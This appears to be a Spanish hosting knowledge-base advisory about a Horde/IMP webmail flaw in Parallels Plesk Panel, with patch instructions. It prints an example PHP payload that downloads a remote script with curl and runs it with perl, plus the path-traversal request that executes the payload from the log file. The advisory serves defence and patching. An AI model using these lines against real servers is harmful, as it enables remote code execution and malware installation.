Hosting Knowledge Base

Vulnerabilidad de seguridad en webmail Horde/IMP de Parallels Plesk Panel

Se ha encontrado una vulnerabilidad recientemente que afecta a las versiones de Horde/IMP (3.1.7-3.3.2) incluidas en Parallels Panel 8.x y versiones anteriores de 9.x (antes de la versión 9.5.4) que permite la ejecución de software malintencionado mediante el acceso al webmail a través de una petición POST al archivo /horde/imp/redirect.php que incluye código PHP como el nombre de usuario. Por ejemplo:

<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>

Como resultado, el código PHP se registra en el archivo /var/log/psa-horde/psa-horde.log y, debido a una vulnerabilidad de seguridad en el archivo, barcode.php, los atacantes pueden hacer que Horde ejecute el código a través de esta petición:

/horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log

Para la resolución de este problema es necesario descargarse un parche realizado por Parallels al respecto dependiendo de la plataforma que empleemos ( Windows o Linux ) y situarlo en la carpeta correspondiente:

Linux:
/usr/share/psa-horde/lib/Horde/ - [ PARCHE ]

Windows:
%plesk_vhosts%\webmail\horde\lib\Horde\ - [ PARCHE ]

Simplemente hay que sustituir el archivo dentro del archivo zip ( Image.php ) por el ubicado en los directorios especificados.

Fuente: http://kb.parallels.com/es/113374

Archivos adjuntos

No se han encontrado archivos adjuntos.

¿Cómo puntuaría esta respuesta?



Comentarios de los visitantes

  • SILICONTOWER, S.L.
  • ESB64611825
  • Rda.General Mitre 25 Bajos 2a
  • 08017 Barcelona